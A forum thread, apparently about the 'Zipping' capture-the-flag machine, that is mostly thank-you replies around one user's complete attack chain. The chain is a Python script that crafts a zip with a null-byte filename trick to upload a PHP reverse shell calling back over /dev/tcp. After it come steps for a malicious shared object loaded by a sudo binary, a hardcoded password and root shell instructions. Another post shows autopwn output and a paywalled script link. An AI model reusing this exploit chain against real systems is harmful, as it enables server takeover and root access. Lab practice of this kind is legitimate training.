[drageb]

Thanks! I've been stuck.

[baxavo]

It is cool to have such writeup!
Thank you!

[akaredpanda]

Thank you bro

---

Thank you for sharing ! I'm completely stuck on it!

[panchoxgrande]

i wrote a script to get reverse shell for user.
start nc port 9001 and then run like this: python script.py -L <your-IP> -R <target-IP>

from struct import pack
import argparse
import zlib
import requests

parser = argparse.ArgumentParser(description='Exploit Zipper')
parser.add_argument('-L', '--listener_ip', help='listener ip')
parser.add_argument('-R', '--target_ip', help='target ip')
args = parser.parse_args()

filename1 = b'rev.php.pdf'
filename2 = b'rev.php\x00.pdf'

filecontent = b"""<?php system("bash -c 'bash -i >& /dev/tcp/"""+args.listener_ip.encode()+b"""/9001 0>&1'"); ?>"""
length = len(filecontent)
crc = zlib.crc32(filecontent)


p  = b''
p += b'\x50\x4b\x03\x04' # magic bytes
p += b'\x14\x00' # version
p += b'\x00\x00' # flags
p += b'\x00\x00' # compression
p += b'\x48\xb9' # modtime
p += b'\x1b\x57' # moddate
p += pack("<L", crc) # crc
p += pack("<L", length) # compressed size
p += pack("<L", length) # uncompressed size
p += pack("<H", len(filename1)) # filename len
p += b'\x00\x00' # extra field len
p += filename1
p += filecontent

# central directory
cd  = b''
cd += b'\x50\x4b\x01\x02' # magic bytes
cd += b'\x14\x03' # version
cd += b'\x14\x00' # version needed
cd += b'\x00\x00' # flags
cd += b'\x00\x00' # compression
cd += b'\x48\xb9' # modtime
cd += b'\x1b\x57' # moddate
cd += pack("<L", crc) # crc
cd += pack("<L", length) # compressed size
cd += pack("<L", length) # uncompressed size
cd += pack("<H", len(filename2)) # filename len
cd += b'\x00\x00' # extra field len
cd += b'\x00\x00' # file comm. len
cd += b'\x00\x00' # disk start
cd += b'\x00\x00' # internal attr.
cd += b'\x00\x00\xA4\x81' # external attr
cd += b'\x00\x00\x00\x00' # offset of local header
cd += filename2

# end of centryl directory record
ecd  = b''
ecd += b'\x50\x4b\x05\x06' # magic bytes
ecd += b'\x00\x00' # disk number
ecd += b'\x00\x00' # disc # w/cd
ecd += b'\x01\x00' # disc entries
ecd += b'\x01\x00' # total entries
ecd += pack("<L", len(cd)) # central directory size
ecd += pack("<L", len(p))
ecd += b'\x00\x00'

f = open("rev.zip", "wb")
f.write(p+cd+ecd)
f.close()

url = "http://{}/upload.php".format(args.target_ip)
headers = {"Content-Type":'multipart/form-data'}
files = {'submit':(None,''),'zipFile':('rev.zip',p+cd+ecd)}
resp = requests.post(url, files=files)

for line in resp.text.split('\n'):
    if 'uploads' in line:
        requests.get("http://{}/{}".format(args.target_ip,line.split('"')[1].split(" ")[0]))
        exit(0)

-----------------

for privesc, you can see the binary /usr/bin/stock, when you call "sudo -l"
you can reverse engineer the binary and find the password and find that it loads the shared object from /home/rektsu/.config/libcounter.so
to exploit, you need to create malicious libcounter.so binary

example code (filename: exploit.c):

#include <unistd.h>

void begin (void) __attribute__((destructor));

void begin (void) {
    system("bash -p");
}

compile the code like this on the target machine:
gcc -shared -o /home/rektsu/.config/libcounter.so -fPIC exploit.c

then you can run the binary with sudo:
sudo /usr/bin/stock
# password: St0ckM4nager

press 3 to exit and you get root shell

Thanks   works for me ..

[null1337]

Hi guys! I'm releasing my second writeup on here.
This time I converted from Markdown to BBCode so it's much more readable.

As always, it includes my thought process and an explanation of what's actually happening. I'll also include an autopwn script soon

thanksssss

[Mandelio]

For some reason obscure to me, the content of the post containing the autopwn script is litterally invisible, I'll repost and hopefully this time it won't disappear...

The programming style is very simple to read as it follows the principle of single responsibility functions, I've also included some prints to make the whole process more understandable.
The only external dependency required is pwntools which is pretty common so it shouldn't be a problem.

Here's a demo

python auto_pwn.py
[+] Revshell payload written at [...]
[...]
Uploading zip file...
[+] Successfully uploaded zip file, revshell available at [...]
[+] Got revshell as rektsu!
Creating shared object...
[+] Source code for shared object written at [...]
[+] Shared object compiled, written at [...]
Uploading shared object via base64...
Exploiting the binary...
[+] Successfully got root!
root@zipping# id
uid=0(root) gid=0(root) groups=0(root)
root@zipping# ls -la
total 12
drwxr-xr-x 2 rektsu rektsu 4096 Aug 28 08:26 .
drwxrwxr-x 3 root  rektsu 4096 Aug 28 08:26 ..
-rw-r--r-- 1 rektsu rektsu  117 Aug 28 08:26 [...]
root@zipping#

Note that [...] only means that the content was censored, it doesn't actually print that.

Without further ado, here's the autopwn script!
[hide cost="8"]
https://pastebin.com/AwuwXr1M
[/hide]

[spooky_fruit]

How to reverse engineer the stock executable to get that shared object path and name? I've been trying various decompilers without luck. Should I debug it in runtime?

[hooneyman]

Thanks !!

[spider2023]

thax very much!!!!!

---

free >????

Hi guys! I'm releasing my second writeup on here.
This time I converted from Markdown to BBCode so it's much more readable.

As always, it includes my thought process and an explanation of what's actually happening. I'll also include an autopwn script soon

[Hitman3]

Thanks a lot!!!